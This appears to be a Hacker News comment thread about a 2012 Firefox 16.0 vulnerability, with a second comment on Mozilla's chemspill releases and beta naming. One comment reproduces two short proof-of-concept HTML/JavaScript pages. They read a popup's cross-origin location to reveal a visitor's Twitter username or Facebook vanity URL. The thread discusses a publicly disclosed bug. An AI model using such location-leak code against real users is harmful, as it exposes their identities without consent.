|
|
|
|
|
|
by pittsburgh
4997 days ago
|
|
|
If you're curious like I was, you can find the details of the vulnerability described by Gareth Heyes at http://www.thespanner.co.uk/2012/10/10/firefox-knows-what-yo... His proof-of-concept of the vulnerability can be found at http://www.businessinfo.co.uk/labs/firefox_knows_what_your_f... (Best fetched via curl... or Firefox 16.0 with an active Twitter session if you're daring.) Or you can just see the source here: <!doctype html>
<script>
function poc() {
var win = window.open('https://twitter.com/lists/',
'newWin', 'width=200,height=200');
setTimeout(function(){
alert('Hello '+/^https:\/\/twitter.com\/([^/]+)/.exec(win.location)[1])
}, 5000);
}
</script>
<input type=button value="Firefox knows" onclick="poc()">
edit: As others discovered, the regex stuff is an unnecessary red herring. Here's a simplified POC that uses Facebook to discover your vanity URL: <!doctype html>
<script>
function poc() {
var win = window.open('https://facebook.com/profile.php',
'newWin', 'width=200,height=200');
setTimeout(function(){
alert('Hello ' + win.location);
}, 5000);
}
</script>
<input type=button value="Firefox knows" onclick="poc()">
|
|
|
There were chemspills for Firefox 13, 14, 15 and now 16. None of those seemed to be caused by the rapid development schedule, they were (IIRC) all issues discovered because the release had much wider exposure compared to beta.
On the other hand, Firefox now does silent updates, so if there hadn't been so much publicity about the Firefox release (or on the update being blocked), it might have been a non-event. In a few hours everyone will be on 16.0.1. I'm not sure if this would have happend to a non-open-source project, if we'd even hear about it.
Maybe we can make it clearer that "Beta" is really Mozillian for "Release Candidate"?